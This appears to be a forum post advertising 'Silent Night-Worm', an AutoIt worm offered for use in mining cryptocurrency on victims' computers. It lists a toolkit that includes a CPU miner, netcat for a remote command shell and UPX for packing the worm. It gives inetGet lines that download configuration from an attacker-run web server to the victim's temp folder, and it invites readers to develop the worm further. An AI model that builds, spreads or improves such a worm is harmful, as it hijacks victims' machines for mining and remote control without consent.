
    • ** Use it on your own risk **

      This is mini version of Silent Night-Worm GTR_ Alpha

      Silent Night-Worm is Open Source and a simple worm For mining coded in autoit

      you can mining with your victims Pcs by this worm

      To Use


      Worm Builder

      Silent Night-Worm.au3




      Tools :-

      minerd.exe : CPU miner run 4 algos (neoscrypt - altscrypt - scrypt - sha256d)

      nc.exe : NetCat For Remote CMD ;)

      Rar.exe : Rar Archiver - Console

      config.json : Your miner config

      upx.exe : Pack Worm
      Note :- You need to upload Rar.exe and wget.exe and upload it from worm Controller To victim PC or modified config.cfg file and worm Func DownTools()


      This is An importan File , All your tools (nc.exe - minerd.exe - config.json) in it with link Edit it and upload your tools and move it to your web server if you don't have Edit worm Func config() : To config.cfg link

      $sN = inetGet('http://'&$Host&'/config.cfg' ,@TempDir & "\config.cfg", $INET_FORCERELOAD, $INET_DOWNLOADWAIT)

      $sN = inetGet('[Enlace externo eliminado para invitados]' ,@TempDir & "\config.cfg", $INET_FORCERELOAD, $INET_DOWNLOADWAIT)

      Note :-

      upload option not tested !

      some error with Client :\ need to fix !!

      Mini-G7R_ -> [Enlace externo eliminado para invitados]

      Feel Free To Develop Worm ;)

      Regards : MGF15

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